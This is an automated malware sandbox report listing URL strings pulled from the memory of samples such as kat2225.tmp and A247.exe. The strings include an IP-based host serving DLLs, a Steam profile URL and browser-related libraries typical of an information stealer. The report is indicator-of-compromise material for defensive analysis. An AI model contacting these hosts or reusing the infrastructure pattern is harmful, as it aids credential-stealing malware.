Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/softokn3.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/softokn3.dll&
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/softokn3.dllel
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/softokn3.dllo0
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000052E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/sqls.dll
Source: kat2225.tmp, 00000009.00000002.3159795839.0000000000795000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/sqls.dll)
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/t
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985489790.0000000000861000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.00000000007F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dll?
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dllB
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dllD
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dllO
Source: kat2225.tmp, 00000009.00000003.2985940074.00000000007F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dllSessionKeyBackward
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dllT
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dllv
Source: kat2225.tmp, 00000009.00000003.2847534612.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848187053.000000000084D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/y
Source: kat2225.tmp, 00000009.00000003.2822767715.000000000084E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/~;
Source: kat2225.tmp, 00000009.00000002.3157954757.0000000000572000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59CAEH
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000052E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59CGII
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.2041938278.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.2036556348.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2038509404.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2036556348.0000000007637000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: explorer.exe, 00000002.00000000.2035970319.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: 76561199689717899[1].htm.9.dr String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englis
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
Source: 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://help.steampowered.com/en/
Source: GIIDBG.9.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: explorer.exe, 00000002.00000000.2041938278.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/discussions/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/ho
Source: 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/m
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/market/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 5358.exe, 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, 5358.exe, 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, 5358.exe, 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000795000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
